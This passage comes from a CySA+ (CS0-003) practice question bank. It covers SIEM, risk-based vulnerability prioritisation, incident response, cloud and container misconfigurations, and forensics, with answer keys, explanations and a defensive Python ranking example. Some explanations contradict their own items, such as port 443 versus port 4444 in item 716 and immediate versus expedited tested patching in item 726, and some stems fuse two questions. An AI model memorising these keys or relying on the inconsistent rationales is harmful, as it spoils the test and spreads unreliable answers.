Broken Object Level Authorization, Excessive Data Exposure, and Mass Assignment are entries in the OWASP API Security Top 10 (API1, API3 and API6 in the 2019 list). In the 2023 edition Excessive Data Exposure and Mass Assignment were merged into API3:2023 Broken Object Property Level Authorization, so expect either name. Injection appeared as API8 in 2019 but was dropped from the 2023 list, and CSRF has never been an API Top 10 category; both are treated as general web-application issues under the main OWASP Top 10.

697
Drag & Drop · medium

Order the steps for setting up a SIEM (Security Information and Event Management) system.

Why this order

SIEM setup includes installation, log source configuration, rule definition, log onboarding, and dashboard creation.

698
Multi-Select · medium

Which findings should be included when reporting remediation performance to asset owners? (Choose two.)

Select 2 answers
A. Recently remediated findings awaiting validation
B. Every raw scanner debug line
C. Unrelated physical-access badge failures
D. Open critical findings past SLA by owner
Answers: A, D

This shows work completed but not yet verified.

Why this answer

Recently remediated findings awaiting validation are a critical metric for asset owners because they confirm that remediation actions have been taken and are pending verification. This aligns with the vulnerability management lifecycle, where validation ensures the fix was applied correctly and no residual risk remains. Including this status in reports gives asset owners actionable insight into remediation progress and any outstanding steps needed to close the finding. Open critical findings past SLA, broken out by owner, are the second metric worth reporting: they show where remediation is stalled and who is accountable for it.

Exam trap

The CS0-003 exam often tests the distinction between operational data (e.g., raw scanner logs) and actionable remediation metrics, tempting candidates to select overly detailed or irrelevant information instead of the concise, status-driven data that asset owners need.

699
MCQ · hard

A vulnerability report has 900 findings. One medium CVSS vulnerability is listed in CISA KEV and has high EPSS; several high CVSS issues are not exploitable in the environment. What should the analyst recommend? For validation, which action should be taken before closing or downgrading the finding?

A.Remediate alphabetically by CVE ID
B.Prioritize the KEV/high-EPSS issue after confirming asset exposure
C.Always sort only by CVSS base score
D.Remediate only vulnerabilities with vendor logos in the report
AnswerB

Known exploitation and likelihood can outweigh base CVSS in risk-based prioritization.

Why this answer

Option B is correct because the CISA KEV vulnerability with high EPSS indicates active exploitation in the wild, making it a critical threat regardless of its medium CVSS base score. Prioritizing it after confirming asset exposure ensures the organization addresses the most imminent risk first, as high CVSS issues that are not exploitable in the environment pose no actual danger. This aligns with risk-based vulnerability management, where exploitability and threat intelligence (KEV, EPSS) override raw severity scores.

Exam trap

The CS0-003 exam often tests the misconception that CVSS base score alone determines priority, but the trap here is that real-world risk assessment must incorporate threat intelligence (KEV, EPSS) and environmental context (exploitability) to avoid wasting resources on non-exploitable high-severity issues.

How to eliminate wrong answers

Option A is wrong because remediating alphabetically by CVE ID ignores all risk factors, such as exploitability, asset exposure, and threat intelligence, leading to inefficient and potentially dangerous prioritization. Option C is wrong because sorting only by CVSS base score neglects environmental context (e.g., non-exploitable high CVSS issues) and active exploitation indicators (KEV, EPSS), which are critical for effective vulnerability management.
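An added example (not from the question bank) of the prioritisation the answer describes: KEV listing and EPSS dominate the ordering, CVSS only breaks ties, a finding confirmed non-exploitable in the environment sinks to the bottom, and a finding cannot be closed or downgraded until its exposure has actually been checked. The findings, identifiers, scores and weightings are constructed placeholders; the weighting scheme is an illustration, not a standard.

```python
"""Added example (not from the question bank): rank findings by exploitation
evidence (KEV, EPSS) and confirmed exposure rather than CVSS alone, and gate
closing/downgrading on a recorded exposure check. All identifiers and scores
are placeholders; the weights are illustrative."""

from dataclasses import dataclass, field
from typing import Optional

@dataclass
class Finding:
    ident: str
    cvss: float
    epss: float                       # probability of exploitation within 30 days, 0..1
    in_kev: bool                      # listed in CISA Known Exploited Vulnerabilities
    exposed: Optional[bool] = None    # None = asset exposure not yet confirmed
    notes: list = field(default_factory=list)

def priority(f: Finding) -> float:
    """Higher is more urgent. KEV dominates, EPSS comes next, CVSS breaks ties;
    a finding confirmed not exploitable in this environment drops to zero."""
    if f.exposed is False:
        return 0.0
    score = (100.0 if f.in_kev else 0.0) + 10.0 * f.epss + f.cvss
    if f.exposed is None:
        score -= 0.5                  # unknown exposure: keep it ranked, but confirm before acting
    return score

def rank(findings):
    return sorted(findings, key=priority, reverse=True)

def downgrade(f: Finding, reason: str) -> bool:
    """Closing or downgrading is only allowed after exposure was actually validated."""
    if f.exposed is None:
        f.notes.append("downgrade refused: exposure not validated")
        return False
    f.notes.append(f"downgraded: {reason}")
    return True

# Constructed findings with placeholder identifiers (not real CVEs or real scores).
FINDINGS = [
    Finding("finding-1", cvss=9.8, epss=0.02, in_kev=False, exposed=False),  # high CVSS, unreachable
    Finding("finding-2", cvss=5.9, epss=0.91, in_kev=True,  exposed=True),   # medium CVSS, in KEV
    Finding("finding-3", cvss=8.1, epss=0.05, in_kev=False),                  # exposure unchecked
    Finding("finding-4", cvss=7.5, epss=0.01, in_kev=False, exposed=True),
]

if __name__ == "__main__":
    for f in rank(FINDINGS):
        print(f"{f.ident:10} cvss={f.cvss} epss={f.epss} kev={f.in_kev} "
              f"exposed={f.exposed} priority={priority(f):.1f}")
```

The 9.8 finding lands last because its exposure check came back negative; finding-3 stays near the top precisely because nobody has checked it yet, and downgrade() refuses to let it be closed until someone does.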

700
Multi-Select · medium

An organization is implementing security hardening for Kubernetes clusters. Which THREE of the following are common Kubernetes misconfigurations that should be addressed? (Select THREE)

Select 3 answers
A. Using namespaces to isolate workloads
B. Implementing network policies
C. Using hostPath mounts without restrictions
D. Running containers in privileged mode
E. Overly permissive RBAC roles
Answers: C, D, E

Mounting host paths can lead to host compromise.

Why this answer

Privileged containers, hostPath mounts, and overly permissive RBAC are common Kubernetes security issues. Using namespaces is good practice, not a misconfiguration. Network policies are recommended for segmentation.

701
Multi-Select · hard

A security analyst is creating a compliance dashboard for a PCI DSS audit. Which THREE metrics should be included to demonstrate compliance with access control requirements? (Select THREE.)

Select 3 answers
A. Number of failed login attempts in the last 24 hours
B. Number of critical vulnerabilities in network devices
C. Number of active user accounts with privileged access
D. Percentage of accounts that have been inactive for more than 90 days
E. Percentage of accounts that have undergone access review in the last quarter
Answers: C, D, E

Correct. Tracking privileged accounts is important for access control.

Why this answer

PCI DSS requires strict access controls, including unique IDs, timely deactivation, and periodic reviews. Failed login attempts and vulnerability scan results are not direct access control metrics.

702
MCQ · hard

During a threat hunting engagement, an analyst creates a hypothesis based on a recent threat intelligence report about a new APT group using DLL side-loading for persistence. The analyst decides to search for processes that have loaded a known vulnerable DLL. Which framework is most appropriate to map the TTPs?

A. Diamond Model
B. NIST CSF
C. MITRE ATT&CK
D. Cyber Kill Chain
Answer: C

ATT&CK provides a detailed taxonomy of techniques used by APT groups.

Why this answer

MITRE ATT&CK is the most comprehensive framework for mapping adversary TTPs, including persistence techniques like DLL side-loading (T1574.002).

703
MCQ · medium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the root-cause analysis phase, which finding would most directly explain the activity?

A. Delete historical flow records to reduce SIEM cost
B. Assume encryption means the transfer is safe
C. Correlate flow volume with database audit logs and the destination reputation
D. Disable all outbound internet access for the organisation
Answer: C

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option C is correct because correlating the flow volume with database audit logs allows you to identify which specific records or queries were accessed during the anomalous transfers, while checking the destination reputation helps determine if the unfamiliar AS is known for data exfiltration or is a legitimate service. This combination directly addresses the suspicious behavior—large encrypted outbound transfers during off-hours—by linking network evidence to host-based logs, which is essential for triaging a potential data breach. Without this correlation, you cannot distinguish between a legitimate backup or replication job and malicious exfiltration.

Exam trap

The CS0-003 exam often tests the misconception that encryption implies trustworthiness, but the trap here is that encrypted traffic can still be malicious, and the correct triage step is to correlate network flows with host-based logs and external reputation data rather than assuming safety or destroying evidence.

How to eliminate wrong answers

Option A is wrong because deleting historical flow records destroys forensic evidence and violates data retention policies (e.g., PCI DSS, GDPR), and it does not address the triage need to investigate the suspicious activity. Option B is wrong because encryption does not guarantee safety; attackers commonly use TLS/SSL to exfiltrate data covertly, and the encryption itself is a red flag when combined with off-hours transfers to an unfamiliar AS.

704
MCQeasy

A third-party provider caused an outage during remediation. What should the communication to the vendor focus on? If the primary audience is the SOC manager, which content choice is most appropriate?

A.A public press statement draft first
B.Confidential unrelated customer data
C.Timeline, service impact, evidence, required corrective actions, and contractual follow-up
D.Internal blame speculation
AnswerC

Vendor communications should be factual and tied to obligations and remediation. The report should be tuned to the SOC manager while preserving factual accuracy.

Why this answer

Option C is correct because when a third-party vendor causes an outage during remediation, the communication must focus on operational and contractual details: the exact timeline of the outage, the scope of service impact (e.g., number of users affected, systems down), evidence (e.g., logs, monitoring alerts), required corrective actions to prevent recurrence, and contractual follow-up (e.g., SLA breach, penalties). This aligns with the SOC manager's need for actionable, factual data to manage incident response and vendor accountability, not public relations or unrelated data.

Exam trap

The CS0-003 exam often tests the distinction between internal operational communication (for SOC managers) and external/public communication (for PR or legal), so candidates mistakenly choose a press statement or irrelevant data instead of the structured incident details required for vendor accountability.

How to eliminate wrong answers

Option A is wrong because a public press statement draft is premature and inappropriate for internal communication to a SOC manager; the primary audience needs technical and operational details, not public messaging. Option B is wrong because sharing confidential unrelated customer data violates data privacy regulations (e.g., GDPR, HIPAA) and is irrelevant to the vendor-caused outage; the communication must focus on the incident itself, not exposing other customer information.

705
Multi-Selecthard

A security team is implementing container security scanning in their CI/CD pipeline. They want to scan container images for vulnerabilities and Kubernetes misconfigurations. Which THREE tools from the following list are best suited for this purpose? (Select THREE)

Select 3 answers
A.Burp Suite
B.Trivy
C.OpenSCAP
D.Clair
E.Snyk
AnswersB, D, E

Trivy is a popular container vulnerability scanner.

Why this answer

Trivy, Clair, and Snyk are all container image scanning tools. OpenSCAP is for compliance scanning of hosts, not containers. Burp Suite is a web application DAST tool.

706
MCQmedium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the alert triage phase, which action gives the analyst the clearest next triage step?

A.Assume encryption means the transfer is safe
B.Delete historical flow records to reduce SIEM cost
C.Disable all outbound internet access for the organisation
D.Correlate flow volume with database audit logs and the destination reputation
AnswerD

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option D is correct because correlating the flow volume with database audit logs allows the analyst to verify if the outbound transfers correspond to legitimate database queries or exports, while checking the destination reputation helps determine if the autonomous system is known for malicious activity. This combination provides the clearest triage value by directly linking the network anomaly to potential data exfiltration or a compromised database server, without prematurely disrupting operations or ignoring the encryption indicator.

Exam trap

The trap here is that candidates assume encryption (option A) guarantees safety, but the exam tests the understanding that encryption can be used to conceal malicious activity, and the correct triage step is to correlate with other logs and threat intelligence rather than making assumptions based on encryption alone.

How to eliminate wrong answers

Option A is wrong because encryption does not imply safety; in fact, encrypted outbound transfers during off-hours to an unfamiliar AS are a classic indicator of data exfiltration (e.g., using TLS to hide stolen data). Option B is wrong because deleting historical flow records destroys forensic evidence and violates retention policies (e.g., PCI DSS, GDPR), and it does not help triage the current alert. Option C is wrong because disabling all outbound internet access is an overly drastic response that would disrupt legitimate business operations and is not a triage step; it should only be considered after analysis confirms a threat.

707
MCQhard

During a post-compromise review, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible? Which action should be prioritized before closure?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth consent grant to stop the attacker's access, then review the mailbox for any data exfiltration or rules created, and finally identify other users who may have consented to the same app to contain the incident. This follows the NIST SP 800-61 incident response process for detection and analysis, ensuring the threat is neutralized and scope is understood before moving to eradication and recovery.

Exam trap

CompTIA often tests the misconception that MFA or password resets are sufficient to revoke OAuth app access, but the trap is that OAuth tokens are independent of the user's authentication factor and require explicit grant revocation.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; once the user grants permissions, the app has a token that bypasses MFA entirely. Option B is wrong because deleting all emails destroys forensic evidence and does not address the root cause—the attacker still retains access via the OAuth grant. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token; the app can continue to access the mailbox using its own stored tokens.

708
MCQhard

An analyst is investigating a suspected data exfiltration via HTTP. The analyst examines a PCAP file and finds a series of HTTP POST requests to an external site with varying 'Content-Length' values. The payloads appear to be base64-encoded strings. Which tool would be most effective for extracting and decoding the payloads for analysis?

A.Wireshark
B.Python with scapy
C.tcpdump
D.NetFlow
AnswerB

Scapy allows programmatic extraction of HTTP payloads and base64 decoding, making it ideal for this task.

Why this answer

Python with scapy allows custom scripting to extract and decode payloads from PCAP files.

709
MCQmedium

During a memory analysis of a potentially compromised host, a security analyst finds a process with an executable image that is not present on disk. Which technique is most likely being observed?

A.Reflective DLL injection
B.Process hollowing
C.API hooking
D.DLL injection
AnswerB

Process hollowing replaces the process memory with malicious code, causing the executable to be memory-only.

Why this answer

Process hollowing involves creating a legitimate process in a suspended state, then replacing its memory with malicious code, so the executable in memory may not correspond to a file on disk.

710
MCQhard

Refer to the exhibit. A security analyst is reviewing an S3 bucket policy in AWS. What is the primary security misconfiguration?

A.The bucket policy grants anonymous read access to all objects.
B.The bucket policy allows all actions.
C.The bucket policy does not require encryption.
D.The bucket policy uses an outdated version.
AnswerA

Principal: '*' means anyone, including anonymous users, can read objects.

Why this answer

The bucket policy includes a principal of '*' without any condition restricting access to authenticated users, which grants anonymous (unauthenticated) read access to all objects in the S3 bucket. This violates the principle of least privilege and exposes data to anyone on the internet, making it the primary security misconfiguration.

Exam trap

CompTIA often tests the distinction between a policy that allows 'all actions' versus one that allows 'read access' but with a public principal, tricking candidates into focusing on the action scope rather than the identity granting anonymous access.

How to eliminate wrong answers

Option B is wrong because while the policy allows 's3:GetObject' (not all actions), the core issue is the anonymous principal, not the action scope. Option C is wrong because the policy does not explicitly require encryption, but that is a secondary concern; the primary misconfiguration is the public access grant. Option D is wrong because the policy version (2012-10-17) is current and not outdated; the version field is a syntax requirement, not a security control.

711
MCQmedium

An analyst is investigating a suspected data breach. The analyst needs to identify which files were exfiltrated and preserve evidence. According to the order of volatility, which of the following should the analyst capture FIRST?

A.Contents of the hard drive
B.Network connections and listening ports
C.CPU registers and cache
D.System logs
AnswerC

These are the most volatile and must be captured first.

Why this answer

Order of volatility prioritizes capturing volatile data first. CPU registers and cache are the most volatile, then RAM, swap, disk, etc.

712
Multi-Selecthard

A legal hold is issued during an investigation. Which actions support it? (Choose two.)

Select 2 answers
A.Preserve relevant logs, mailboxes, images, and tickets
B.Let each team decide informally what to delete
C.Purge audit logs to save storage
D.Suspend routine deletion for in-scope evidence
AnswersA, D

Potential evidence must be retained.

Why this answer

A legal hold (litigation hold) requires preservation of all potentially relevant electronically stored information (ESI). Preserving logs, mailboxes, images, and tickets ensures that data is not altered or deleted, maintaining its integrity for forensic analysis and legal proceedings. This action directly supports the hold by preventing spoliation and ensuring compliance with discovery obligations.

Exam trap

The CS0-003 exam often tests the misconception that cost-saving measures (like purging logs) are acceptable during a legal hold, when in fact any deletion—even for legitimate storage management—violates the preservation requirement and can be considered spoliation.

713
MCQmedium

A security analyst is creating a Sigma rule to detect suspicious usage of 'schtasks.exe' to create a scheduled task that runs an encoded PowerShell command. Which log source is most appropriate for this rule?

A.Windows Security Event Log (Event ID 4624)
B.Sysmon Event ID 1 (Process creation)
C.DNS server log
D.Windows PowerShell operational log
AnswerB

Correct. Sysmon Event ID 1 captures process creation with command line.

Why this answer

Sigma rules are written for log sources. Process creation logs (e.g., Event ID 4688 or Sysmon Event ID 1) capture command-line arguments.

714
Multi-Selecthard

A security analyst is performing an API vulnerability test using OWASP ZAP. The analyst finds several issues. Which THREE of the following are common API vulnerabilities according to OWASP? (Select THREE.)

Select 3 answers
A.Broken Object Level Authorization
B.Excessive Data Exposure
C.SQL Injection
D.Cross-Site Scripting (XSS)
E.Broken Authentication
AnswersA, B, E

API1:2019 – Broken Object Level Authorization.

Why this answer

Broken object level authorization, excessive data exposure, and broken authentication are common API vulnerabilities listed in OWASP API Security Top 10.

715
MCQmedium

A server team needs to fix an OpenSSL vulnerability across Linux hosts. What should the technical remediation section include? If the primary audience is the technical remediation owner, which content choice is most appropriate?

A.Only a red/yellow/green chart
B.Only the CVE headline
C.Affected assets, package versions, patch commands or vendor guidance, validation method, and rollback notes
D.Only estimated financial loss
AnswerC

Technical teams need precise, actionable remediation steps and a way to confirm success. The report should be tuned to the technical remediation owner while preserving factual accuracy.

Why this answer

Option C is correct because a technical remediation section must provide actionable steps for the remediation owner. This includes identifying affected assets and package versions, specifying patch commands or vendor guidance, outlining a validation method to confirm the fix, and including rollback notes in case the patch causes issues. Without these details, the remediation owner cannot execute the fix reliably or verify its success.

Exam trap

The CS0-003 exam often tests the distinction between reporting to executives (which uses summary charts) and providing technical remediation details to the remediation owner, leading candidates to mistakenly choose a high-level summary like a chart or CVE headline instead of the actionable, step-by-step content required for the technical audience.

How to eliminate wrong answers

Option A is wrong because a red/yellow/green chart is a status summary for executive reporting, not a technical remediation plan; it lacks the specific commands, versions, and validation steps needed to fix an OpenSSL vulnerability. Option B is wrong because only the CVE headline (e.g., CVE-2024-XXXX) provides no actionable information; the remediation owner needs affected package versions, patch commands, and rollback procedures, not just a vulnerability identifier.

716
MCQmedium

Refer to the exhibit. An analyst sees this output from a workstation. Which of the following is the most likely explanation?

A.The workstation is receiving NTP time synchronization
B.The workstation is performing a port scan
C.The workstation is a web server
D.The workstation is infected with malware connecting to a C2 server
AnswerD

Multiple connections to the same IP on port 4444 are suspicious.

Why this answer

The output shows repeated outbound TCP connections to a single external IP address on port 443 (HTTPS) with varying source ports, which is characteristic of beaconing behavior. Malware often establishes periodic connections to a command-and-control (C2) server to receive instructions or exfiltrate data, and the pattern of multiple connections from different ephemeral ports to the same destination is a common indicator of such activity.

Exam trap

The trap here is that candidates see HTTPS (port 443) and assume legitimate web server or normal browsing, missing the key indicator of repeated outbound connections to a single external IP, which is a hallmark of C2 beaconing rather than typical client-server communication.

How to eliminate wrong answers

Option A is wrong because NTP time synchronization uses UDP port 123, not TCP port 443, and the output shows TCP connections, not NTP packets. Option B is wrong because a port scan typically involves connections to multiple destination ports on a target, not repeated connections to a single destination port from varying source ports. Option C is wrong because a web server listens on TCP port 80 or 443 for inbound connections, whereas this output shows outbound connections from the workstation to an external IP, indicating client-side behavior.

717
MCQmedium

A security analyst is reviewing a SIEM alert indicating a high number of failed authentication attempts from a single IP address against multiple user accounts. The analyst checks the logs and finds the IP belongs to a known vulnerability scanner used by the internal security team. How should the analyst classify this alert?

A.True positive - unauthorized access attempt
B.False positive - authorized activity
C.True positive - lateral movement
D.False negative - missed detection
AnswerB

The activity is legitimate and should be classified as a false positive.

Why this answer

The alert is triggered by authorized activity from a known internal scanner, so it is a false positive. The SIEM rule should be tuned to exclude this scanner or reduce its severity.

718
MCQmedium

During a security incident, the SOC team identifies indicators of compromise (IoCs) related to a new malware strain. Which type of threat intelligence report should be produced for the SOC team to enhance detection?

A.Tactical intelligence report with IoCs and detection signatures
B.Technical intelligence report on malware code analysis
C.Strategic intelligence report on global threat trends
D.Operational intelligence report on threat actor campaigns
AnswerA

Tactical intelligence provides actionable technical details.

Why this answer

Tactical intelligence provides IoCs, TTPs, and actionable details for defenders to detect and mitigate threats.

719
MCQmedium

A vulnerability management team has identified a critical vulnerability with a CVSS score of 9.8. The vulnerability affects a public-facing web server that handles sensitive customer data. The team decides to apply a patch immediately without going through the normal patch testing cycle. What type of patching procedure is this?

A.Rolling patch deployment
B.Patch compliance tracking
C.Emergency patching
D.Standard patch management
AnswerC

Emergency patching is used for urgent vulnerabilities to reduce risk quickly.

Why this answer

When a critical vulnerability is actively exploited or poses immediate risk, emergency patching procedures are used to expedite deployment without standard testing.

720
Multi-Selecthard

A security analyst is prioritizing vulnerabilities for remediation. The analyst has the following information: a vulnerability with a CVSS score of 9.0 that affects a public-facing web server, and a vulnerability with a CVSS score of 7.5 that affects an internal database server with sensitive data. Which two factors should the analyst consider when prioritizing? (Choose two.)

Select 2 answers
A.The presence of known exploits in the wild.
B.The vendor's patch release date.
C.The asset's exposure and criticality.
D.The number of open ports on each server.
E.The vulnerability publication date.
AnswersA, C

Active exploits increase urgency.

Why this answer

Option A is correct because the presence of known exploits in the wild directly impacts the likelihood of a vulnerability being weaponized. Even a high CVSS score (e.g., 9.0) may be less urgent if no exploit exists, while a lower-scored vulnerability (e.g., 7.5) with active exploitation poses an immediate threat. This aligns with the CVSS environmental metrics and threat intelligence integration in vulnerability management.

Exam trap

The CS0-003 exam often tests the misconception that CVSS score alone determines priority, whereas the correct approach combines CVSS with threat intelligence (exploit availability) and asset criticality/exposure.

721
MCQmedium

During a security incident, the SOC analyst determines that the attack is originating from an internal IP address belonging to the finance department. The incident response plan requires escalation to the appropriate team. Which of the following should the analyst contact first?

A.The legal department to handle potential compliance issues.
B.The system administrator for the finance department to isolate the host.
C.The finance department manager to confirm if the activity is authorized.
D.The human resources department for disciplinary action.
AnswerC

Verifying with the department manager confirms if the activity is legitimate before further action.

Why this answer

Option C is correct because the incident response plan requires confirmation of authorization before taking containment actions. Since the activity originates from an internal IP in the finance department, the analyst must first contact the finance department manager to verify whether the traffic is legitimate business use (e.g., a scheduled audit or approved data transfer). This step prevents unnecessary disruption and aligns with the 'verify before act' principle in NIST SP 800-61 incident handling.

Exam trap

CompTIA often tests the misconception that technical containment (e.g., isolating a host) should be the immediate next step, but the correct sequence requires verifying authorization first to avoid disrupting legitimate business operations.

How to eliminate wrong answers

Option A is wrong because legal department involvement is premature at this stage; compliance issues are only considered after unauthorized activity is confirmed, not before verifying authorization. Option B is wrong because isolating the host without first confirming the activity is authorized could disrupt legitimate business operations and violates the verify-before-contain principle; system administrators are contacted after authorization is denied. Option D is wrong because HR disciplinary action is a post-incident response step, only relevant after unauthorized activity is confirmed and attributed to an individual, not during initial triage.

722
MCQmedium

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the root-cause analysis phase, which finding would most directly explain the activity?

A.Reinstall the browser used by the user
B.Living-off-the-land binary misuse and the downloaded file's hash, origin, and child process
C.Ignore it because certutil is signed by Microsoft
D.Only check whether antivirus signatures are current
AnswerB

Certutil can be abused to download payloads; file and process context establishes whether execution is malicious.

Why this answer

Option B is correct because certutil.exe is a known living-off-the-land binary (LOLBin) that attackers abuse to download payloads from external URLs, bypassing application whitelisting. The root-cause analysis must focus on the downloaded file's hash (to identify malware), its origin (the external URL), and any child processes spawned (to trace execution chain), as these directly explain the malicious activity.

Exam trap

The CS0-003 exam often tests the misconception that signed Microsoft binaries are inherently safe, tricking candidates into ignoring LOLBin abuse, when the real focus should be on the downloaded file's hash, origin, and execution chain.

How to eliminate wrong answers

Option A is wrong because reinstalling the browser does not address the root cause; the attack used certutil.exe, not the browser, so the browser is irrelevant to the download or execution. Option C is wrong because ignoring the alert due to certutil being signed by Microsoft is a dangerous misconception; attackers exploit legitimate signed binaries (LOLBins) to evade detection, and the activity is clearly anomalous and requires investigation.

723
Multi-Selectmedium

Which items belong in a vulnerability exception request? (Choose three.)

Select 3 answers
A.Business justification for delayed remediation
B.A request to remove the asset from inventory
C.Expiration or review date
D.Compensating controls
AnswersA, C, D

Justification explains why normal remediation cannot occur.

Why this answer

A vulnerability exception request is a formal process to accept the risk of not remediating a vulnerability within the standard timeframe. A business justification for delayed remediation is a core component because it documents the operational, financial, or technical reasons why the fix cannot be applied immediately, which is required for risk acceptance by management. Without this justification, the exception lacks the necessary context for approval and audit compliance.

Exam trap

The CS0-003 exam often tests the distinction between operational risk acceptance (exception request) and asset lifecycle management (decommissioning), leading candidates to incorrectly include asset removal as part of the exception process.

724
MCQmedium

An analyst needs to collect evidence for a compliance audit. Which type of evidence is most appropriate to demonstrate that access reviews are performed regularly?

A.Vulnerability scan reports
B.Access review reports
C.Configuration backups
D.Log exports of user activity
AnswerB

These reports document the review process and decisions.

Why this answer

Access review reports serve as direct evidence that reviews are conducted, showing dates and outcomes.

725
MCQeasy

A security analyst reviews the above bucket policy. Which of the following BEST describes the risk associated with this policy?

A.The bucket is publicly readable, potentially exposing sensitive data
B.The bucket allows anyone to upload malicious files
C.The bucket enforces encryption in transit
D.The bucket requires authentication for access
AnswerA

Principal: * allows unauthenticated access.

Why this answer

Option A is correct because the policy allows any anonymous user to read objects. Option B is wrong because the policy grants GET (read), not PUT (upload). Option C is wrong because encryption in transit is not addressed by the policy. Option D is wrong because the policy does not require authentication; a principal of '*' permits unauthenticated access.

726
MCQhard

A security team uses the Common Vulnerability Scoring System (CVSS) v3.1 to prioritize vulnerabilities. They find a vulnerability with a base score of 7.5 and vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. However, the asset is a public-facing web server with no backups. The team also checks the Exploit Prediction Scoring System (EPSS) and sees a score of 0.95 (95% probability of exploitation in the next 30 days). Which action should the team take first based on prioritizing by risk?

A.Expedite patch testing and deployment, and consider emergency change procedures
B.Apply the patch within the next 30 days as part of routine maintenance
C.Implement a network-based intrusion prevention system signature to block exploitation attempts
D.Deploy the patch immediately in the production environment without testing
AnswerA

Given the high EPSS and critical asset, the patch should be expedited with emergency change management.

Why this answer

The high EPSS score indicates imminent exploitation, and the impact to availability is high. The CVSS impact reflects a potential denial of service, which is critical for a public-facing server. The lack of backups increases the risk of data loss or extended downtime. Therefore, immediate patching is the priority.

727
MCQmedium

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a workstation to an external IP address known for command and control (C2) activity. Which classification should the analyst assign to this incident?

A.Insider threat
B.Data breach
C.Phishing
D.Malware
AnswerD

C2 communication is a classic indicator of malware infection, such as a botnet or trojan.

Why this answer

The incident involves communication with a known C2 server, which is characteristic of a malware infection (specifically, a botnet or trojan). This falls under the malware category.

728
MCQmedium

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the containment trade-off phase, which response balances containment with evidence preservation?

A.Sign-in logs, MFA result, device details, and mailbox audit events
B.The organisation's public DNS zone file
C.Only the user's browser cache
D.Only DHCP logs from the London office
AnswerA

Impossible travel plus forwarding rule creation is a strong account-compromise pattern; identity and mailbox audit data confirm whether the activity is malicious.

Why this answer

Option A is correct because the UEBA rule indicates a possible account compromise (impossible travel followed by mailbox rule creation). The analyst must first verify the sign-in logs for authentication source IPs, MFA result to check if the attacker bypassed MFA, device details to identify if a known device was used, and mailbox audit events to confirm the forwarding rule. These four data sources provide the minimum evidence needed to assess the scope of compromise before containment.

Exam trap

The CS0-003 exam often tests the candidate's ability to prioritize server-side logs (sign-in, MFA, audit) over client-side artifacts (browser cache) or unrelated infrastructure (DNS zone file) when investigating a UEBA alert for account compromise.

How to eliminate wrong answers

Option B is wrong because the organisation's public DNS zone file is irrelevant to a user-level authentication and mailbox rule anomaly; DNS records do not contain user sign-in or mailbox audit data. Option C is wrong because the user's browser cache is a client-side artifact that may be overwritten or inaccessible, and it does not provide server-side evidence of authentication events or mailbox rule creation, which are critical for forensic analysis.

729
MCQhard

During a security incident, a SOC analyst identifies that customer PII has been exfiltrated. The company operates in multiple states and processes EU residents' data. Which of the following is the MOST critical immediate communication requirement?

A.Notify law enforcement within 24 hours
B.Notify affected customers within 48 hours
C.Notify the relevant data protection authority within 72 hours
D.Issue a press release within 24 hours
AnswerC

GDPR 72-hour rule for supervisory authority notification.

Why this answer

GDPR requires notification to the supervisory authority within 72 hours of becoming aware of a breach involving personal data.

730
Multi-Selectmedium

A security analyst is conducting a vulnerability assessment on a cloud environment and needs to select a tool to scan for misconfigurations against the CIS AWS Foundations Benchmark. Which TWO of the following tools are capable of performing compliance scanning against cloud benchmarks? (Select TWO.)

Select 2 answers
A.Nessus
B.Qualys
C.OpenSCAP
D.ScoutSuite
E.Wireshark
AnswersC, D

Correct; OpenSCAP can evaluate systems against CIS benchmarks, including cloud.

Why this answer

OpenSCAP and cloud-specific tools like ScoutSuite (or Prowler) can assess cloud configurations against CIS benchmarks. Nessus and Qualys primarily do vulnerability scanning, though they may have some compliance modules, but the question expects tools specifically for cloud benchmarks. OpenSCAP can be used with cloud content, and ScoutSuite is a cloud security auditing tool.

731
MCQhard

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

A.Only physical datacenter access logs
B.Only user password age reports
C.Container runtime events, Kubernetes audit logs, and network flow from the pod
D.Only monthly vulnerability scan summaries
AnswerC

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Container runtime events (e.g., from containerd or CRI-O) capture process spawns like a shell inside the container, Kubernetes audit logs record API calls that mount host paths (e.g., `hostPath` volumes), and network flow logs (e.g., from CNI plugins or eBPF) show outbound connections to unknown IPs. Together, these three telemetry sources provide the full kill chain—execution, privilege escalation, and exfiltration—making option C the most useful for detection engineering.

Exam trap

The CS0-003 exam often tests the misconception that host-level logs (like datacenter access or password reports) are sufficient for container security, when in fact container-specific telemetry is required to detect runtime anomalies like shell execution and unauthorized mounts.

How to eliminate wrong answers

Option A is wrong because physical datacenter access logs track who entered the facility, not container-level activities like shell execution or network flows; they are irrelevant to a workload compromise. Option B is wrong because user password age reports indicate password policy compliance, not real-time runtime behavior; they cannot detect a shell spawning or outbound connections from a container.

732
Multi-Selectmedium

A company has experienced a ransomware attack that encrypted critical servers. The incident response team is in the containment, eradication, and recovery phase. Which THREE actions are part of long-term containment? (Choose three.)

Select 3 answers
A.Apply security patches to vulnerable systems
B.Rotate all privileged account credentials
C.Isolate the infected systems from the network
D.Block the ransomware's C2 domain at the firewall
E.Rebuild affected servers from clean backups
AnswersA, B, E

Correct. Patching addresses root cause.

